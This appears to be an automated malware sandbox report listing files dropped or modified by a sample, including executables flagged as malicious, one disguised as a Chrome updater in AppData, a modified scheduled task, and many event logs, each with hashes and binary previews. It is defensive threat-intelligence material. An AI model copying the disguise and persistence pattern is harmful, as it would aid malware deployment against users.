Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uefuje10.peg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zv0o1bgn.s1b.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp

Download File

Process:	C:\Users\user\Desktop\ylVAEHbMLf.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	138240
Entropy (8bit):	5.950803924898273
Encrypted:	false
SSDEEP:	3072:7B3AKJLoyiQYsQYhF+gs30x7i392OBXUhE3:L0wJQYhMgs367iEORUh
MD5:	997A51E9EB3A909EE9A0C1CDF1AFFDDC
SHA1:	8A293E4F835A79CC13966677180653984B39ACD5
SHA-256:	5195EA12FCDC46E208662607CA7C0A062D0AC3A91B0F7228EE48E8A42A12B746
SHA-512:	44A725A28F33636A5686D24BE8FB20C6CB89EC2C3EAF6A40D109B6495E2DCC1BAD335C3D7B9345F138968C2D9EBF617E65341675E193D3DD6B7A3ECAD2F6051B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&.......................@....................................e^....`... ..............................................`..4...............................8...............................(....................b..P............................text...............................`..`.data...............................@....rdata..p<.......>..................@..@.pdata..............................@..@.xdata.......0......................@..@.bss....`....@...........................idata..4....`......................@....CRT....`....p......................@....tls................................@....reloc..8...........................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

Download File

Process:	C:\Users\user\Desktop\ylVAEHbMLf.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5980672
Entropy (8bit):	7.688779848966801
Encrypted:	false
SSDEEP:	98304:Q/PrJHt+UOW/6U0GEkZqBq+2fxF2FZrejHPTu+8:QnrRkU0CZqBna2FZrIHid
MD5:	3FB477EE2214BF2D4ED7DF2D23F159E8
SHA1:	836C3F3B4B8F02E495703767B6BF923C453DBA36
SHA-256:	508821549DB3334CCCD6D492E17B29343EA5D0BDA03379188C083E8C2217C291
SHA-512:	E45C0E45177A3BB56B3685AA52C7107D390B9F9519EDB5E2BC475DC20CFAD615DEF0786039583255AD178B9F6D0941A0166B43DA7A9C90ACEFB55EB6B27634E4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&.....>[................@..............................[......Y[...`... ..............................................p[.4.....[...... [.p.............[.0.............................[.(....................r[.P............................text...@...........................`..`.data....,Y.......Y.................@....rdata...:....Z..<....Z.............@..@.pdata..p.... [.......[.............@..@.xdata.......@[.......[.............@..@.bss....@....P[..........................idata..4....p[......&[.............@....CRT....`.....[......2[.............@....tls..........[......4[.............@....rsrc.........[......6[.............@....reloc..0.....[......>[.............@..B........................................................................................................................................................................

C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	4680
Entropy (8bit):	3.7112052897356045
Encrypted:	false
SSDEEP:	96:pYMguQII4iAu6h4aGdinipV9ll7UY5HAmzQ+:9A4Jb/xne7HO+
MD5:	DA464F9AEE5320C3B415CD967E6D2A20
SHA1:	CA25E9721564A73C9F105DEA3C3594FA35DE81EC
SHA-256:	0FF6E67F4C64C709B0D68E306FBB662D050F42723091D5BCE6DB6314C9C7F8F9
SHA-512:	C62522C6E2D8427FEBD7C76052A27F85E9A199BA107F551A6C0A10E4F3D78210C8793C5E967BE2AA13B4B0B42C09C4C2787B5A39AE81A0D184CF5C98A85D099C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...6.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.S.o.u.r.c.e.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.S.o.u.r.c.e.>..... . . . .<.A.u.t.h.o.r.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.A.u.t.h.o.r.>..... . . . .<.V.e.r.s.i.o.n.>.1...0.<./.V.e.r.s.i.o.n.>..... . . . .<.D.e.s.c.r.i.p.t.i.o.n.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.1.).<./.D.e.s.c.r.i.p.t.i.o.n.>..... . . . .<.U.R.I.>.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.o.f.t.w.a.r.e.P.r.o.t.e.c.t.i.o.n.P.l.a.t.f.o.r.m.\.S.v.c.R.e.s.t.a.r.t.T.a.s.k.<./.U.R.I.>..... . . . .<.S.e.c.u.r.i.t.y.D.e.s.c.r.i.p.t.o.r.>.D.:.P.(.A.;.;.F.A.;.;.;.S.Y.).(.A.;.;.F.A.;.;.;.B.A.).

C:\Windows\System32\winevt\Logs\Application.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	3376
Entropy (8bit):	3.9104888838598133
Encrypted:	false
SSDEEP:	48:M+oQzrP+sXCrPwfFRVEfWb3/OoNMryTL3WpAEvrNHSqdrSDFDSLW1h:4QRCrup/vOo+uLGpJvrpjoFeWj
MD5:	47F0BD90C8940566F440FBC90833EF62
SHA1:	B7723CF02BCEBF9B830F509B58C48386837FCB76
SHA-256:	8AC71BF9F4C67D1FB3FFC3EB5856E6C5C581C59801629E03B10AE5FCCB1D8782
SHA-512:	D8C34F6D044BCFBE3F84F37FA602FB5F305F3606C77431E5181BD71AAE38668642964212EFACD4AED1C31A928A7032D928F05534C7C75C5D6A6250E03F973423
Malicious:	false
Preview:	ElfChnk.................r.......s...........X...0....?\|.....................................................................:X".............................................=...........................................................................................................................g...............@...........................n...................M...]...........................h...................................................................&...............................................~...**..X...r.......4.4.............D.&.........D..T.Xb.L............A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.

C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 304, DIRTY
Category:	dropped
Size (bytes):	109960
Entropy (8bit):	3.645079239697732
Encrypted:	false
SSDEEP:	768:fVUHiapX7xadptrDT9W84DSVUHiapX7xadptrDT9W84D:+Hi6xadptrX9WPRHi6xadptrX9WP
MD5:	648054A96924A2C5307E5F8C98995FC2
SHA1:	371E321D0CB43CD38F9BAB15F3A8D802A4100BD2
SHA-256:	D6DF7454612E6E107654B2715EF4324BEB7BA5083D506FFCA1D6AB16882E212B
SHA-512:	1CD787EFC5C2AD66EFA70D5850F9A0EDF8EFE50127D93741942E26D45075B673E44D220F9A1B6785AA98EF6B754F9DFA8D0381B986B56C1F49562CD218F7B41B
Malicious:	false
Preview:	ElfFile.................0...................................................................................................Fo.xElfChnk.........1...............1...........p...............................................................................8@..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.010692427789071
Encrypted:	false
SSDEEP:	384:GhLNzhNCjN0QNGNgN7NxEN5N0RN0zN0mN0RN00N0oN0xN0qNeN0NN0UN0lN09N0Q:GnqqIJMa/Mh9sUwBYAJGUarGlEwxV
MD5:	26C4C5213F3C6B727417EF07207AC1E0
SHA1:	1815CC405C8B70939C252390E2A1AEC87EFF45F2
SHA-256:	767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
SHA-512:	0355BBF16EB471698F47189031E8E18306D8F748E6CC5328C33301BEAAE435647532B24F5EC42A94B92390C19E60D11846B412C6747DC82DC98999E649607B65
Malicious:	false
Preview:	ElfChnk.%.......J.......%.......J............b..Pe.....:....................................................................&...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........].......M...............................VY..................................**......%........0................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1424
Entropy (8bit):	3.380935153958953
Encrypted:	false
SSDEEP:	24:MQ/w/Ag/Tg2W867NV8KBD8/4NeGy7NjA8KBD8/4Nes:MQYYkWhpqV+upXV+j
MD5:	6087F7A271816C7AF52FD8DB8DE6F6FA
SHA1:	6360719C6D0E5916B2FF30BF8968AD06496D6F5B
SHA-256:	7B970D46E047FC2A67C549F2A65F019EC350AD55BEFBDF474FD835C9B75F5601
SHA-512:	EF3981FD7B126690C083153CB92BFBD6F4A64BFEFE894F242744CFF56F1D95C29DD97829E0BBE00F0F8506E9880B08A97790BCBA65EE51533847FBB150CE2C7E
Malicious:	false
Preview:	ElfChnk.............................................c.E.....................................................................}.}.................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................................................&...............................................................@.......X...a.!.....E..........@..........&O.....}'O........P........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y.....O.p..................................

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.427635478918843
Encrypted:	false
SSDEEP:	384:ihTm5mcamNQomomTDDr0moOm3OPlfmMsgJm5mnmYmcmum/mqmlmtmumbsmbmvMmk:iO0D6CL49mVpgwQFQ
MD5:	C8075C4B407B2F8A2DC4553F58DB6529
SHA1:	191F48FF541EF904C7AF761333D0A235D289EE0C
SHA-256:	E9834CEC17491574BBF11920B6A9E080BA512E12385CCB71D99341BBEB6E7E78
SHA-512:	875A2FC4DF97E1C4E88404CFF25A218D817FA7850C69C61EC6C99AB452BD80999A02B25BD37100D2D746D90149D1A72ACCB503FC398D2F0B990D7A3AF31DAC46
Malicious:	false
Preview:	ElfChnk..!.......!.......!.......!..................s........................................................................b@.................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................#...............&...................................**.......!......o.T..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 2, DIRTY
Category:	dropped
Size (bytes):	69448
Entropy (8bit):	0.6204758448770777
Encrypted:	false
SSDEEP:	96:50NVaO8sMa3Z85ZML5rjj23Z85ZuhNVaO8sMa3Z85ZML5rjj23Z85Zu:5KV7pp8nMLRv2p8niV7pp8nMLRv2p8n
MD5:	3FB83F59849012EA2FEC5DE77A2A92A1
SHA1:	808D3C9314E6AAF56DFC3EE3E8D7E65CA43EC55C
SHA-256:	B14A0A708E3818CB8BA1D2B806EA5FA57B12893F1C52B8F91D310280D4CA26FC
SHA-512:	7A12FB2E294859F1EF8CD2701F4A69C29E4E5DBDAC51177303897E7DBB2F78CEFC914A36A841972F14D69AB0EDCC96047D3E92845E538990F9B388FA0412E129
Malicious:	false
Preview:	ElfFile.....................................................................................................................A..>ElfChnk.....................................p.......y.Qp....................................................................D.#.............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.014860518194814
Encrypted:	false
SSDEEP:	1536:xbBN2A4VD7VAx8whAGU2woJQghcI5oIRA4Hw:
MD5:	4FB8E2CF8B3F20534836684947962DC2
SHA1:	B263607E627C81DA77DB65DF5AED2F3FD84B83E2
SHA-256:	DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
SHA-512:	D982DB741A044E222D567712FB4799FF6524A1D451C3D2EE3DF7EB17031AD20EF4EC7098BCFB3E2B00C929EB6569C858EFCF275B28240425E4BF8D994AED9053
Malicious:	false
Preview:	ElfChnk.........V...............V...................0q....................................................................... I............................................=...................................................................................%.......................................X...............?...............................................M...F...................................................................................................................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.15655690871689
Encrypted:	false
SSDEEP:	768:SPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9tFk6dd3s:eXY5nVYIyyqED5BVZUeouPZ
MD5:	2DE60575CB719BF51FAB8A63F696B052
SHA1:	BD44E6B92412898F185D5565865FEA3778573578
SHA-256:	7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
SHA-512:	0471E7824795996992E736F33FEA7AF70EA909804DE3AC59EE76B5D0403901A5147558256C3AAE87BA8F1747D151DE63134661BEB9F6E0FF25AB0E3E89BC6B4A
Malicious:	false
Preview:	ElfChnk.........o...............o..........................................................................................._..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	93800
Entropy (8bit):	2.1490094191026214
Encrypted:	false
SSDEEP:	384:josKWoohdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorRor9orwTorYo4:3DCYADCYE0
MD5:	51300ED21A496B61B4D65BEF7934C70B
SHA1:	58833E7B9784167CA4795E74198DAAD57C86D615
SHA-256:	EE861A09108174FCC941817E1BF4D6BF9754FE24BB4D4DA6A5A04CC36182AF3F
SHA-512:	8DA3B0F27E0FC54EA4B188DF7362DEA12A4E4952C3025F619744EBA7746C39DBFA5A518CE96B94F178AFD09EAE18069E16D9396A35FCBC05510BB144F9D34B4F
Malicious:	false
Preview:	ElfChnk......................................+...-....;s......................................................................uX................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................$..U)..............................**...............x................$..............................................................>.......V...X.!..e...............x.......&O....o.'O........@........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...!>.U)......!>....[.U.....i...........\|...:....A..3...b...%....=.......F.i.l.e.N.a.m.e.L.e.n.g.t.h.......A..3...b...%....=.......F.i.l.e.N

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8524226245257144
Encrypted:	false
SSDEEP:	384:JhAiPA5PNPxPEPHPhPEPmPSPRP3PoPpPTP8PXPr5P:J2Nr
MD5:	B8E105CC52B7107E2757421373CBA144
SHA1:	39B61BEA2065C4FBEC143881220B37F3BA50A372
SHA-256:	B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
SHA-512:	7670455904F14DA7A9EEFBAD5616D6D00EA262C979EDABB433182500B6EF918C6E534C94DF30D829016C8539DF12CAD5F53EC884C45AA71ACA35CF9B797361BC
Malicious:	false
Preview:	ElfChnk......................................#...&...l2.......................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................#..........'.......................**..x.............\|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8432997252442703
Encrypted:	false
SSDEEP:	384:4hZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+l9:4WXSYieD+tvgzmMvRpBWfb
MD5:	39EE3557626C7F112A88A4DE12E904C1
SHA1:	C307FECC944D746A49EEA6451B7DA7301F03504C
SHA-256:	2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
SHA-512:	304C866E246B3F63BF126B33AED784913A078D44913FD987D896D2D960578B61BA7E24BA3CB8FC76608AB1E5702D0FE587A5FB8C38CDF8913D60F88B1435A2D9
Malicious:	false
Preview:	ElfChnk......................................"...&.....k.....................................................................n..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................."..................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.9223892466691472
Encrypted:	false
SSDEEP:	384:whqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28t:wbCyhLfIXBS5
MD5:	93BC7C28E3A7B0EC7634432FFB5F26AE
SHA1:	388548D6291DA80F672153D1C18E32BDA335AA90
SHA-256:	D354F4EA745283540D197B6D4C57EFC4F539F7566CFB3A06AEBD1243CD222EE1
SHA-512:	3235FEA5A58C72DCD680D436AA2652F5221C6AC6F5A53882C7817A8A65E63C13087CD5660839FC7CFA0F62C666014608B91ABB4235EF5F79F68EF5806252F84A
Malicious:	false
Preview:	ElfChnk.........F...............F...............P............................................................................................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n...................................................6...................................*..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.838106263184782
Encrypted:	false
SSDEEP:	768:ccMhFBuyKskZljdoKXjtT/r18rQXn8r3e5POH:JMhFBuVge
MD5:	A2D41740C1BAF781019F282E37288DDF
SHA1:	A6FE635B3EC8A6923EDE10C23FC79DD32EF4F621
SHA-256:	7008D3010B17C0B09643D10D26B19FB971BB1963C414C1466BEAD617CF9F15E7
SHA-512:	E33A0A2F9473D2D05E9704FE16E6EE34FB51FD8E25A3D60E1F7A67665CA14421B6511D896526AFC7CAE1BF629BB7013FA10663620C5450F1BB51A465EF5A51CB
Malicious:	false
Preview:	ElfChnk.........?...............?...................<.md.....................................................................?.Q................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A......&...................................**..x...........,.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.634418630947688
Encrypted:	false
SSDEEP:	768:/VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaUeI36ISKEeKRe:cH
MD5:	A00BAFFCABB00428EA0512FCECCC55E5
SHA1:	19F7C942DC26C3FF56D6240158734AFF67D6B93E
SHA-256:	92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
SHA-512:	DF94AA8FA0610A0EFE7BAC0DB2A01645A4CD1C7FAD62E914EF914B526B651ED62600F63909D26149FD17C259348DADE05F48759B1DF092970251DB86690CC2B6
Malicious:	false
Preview:	ElfChnk.........m...............m.....................]......................................................................p.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.0646587531847893
Encrypted:	false
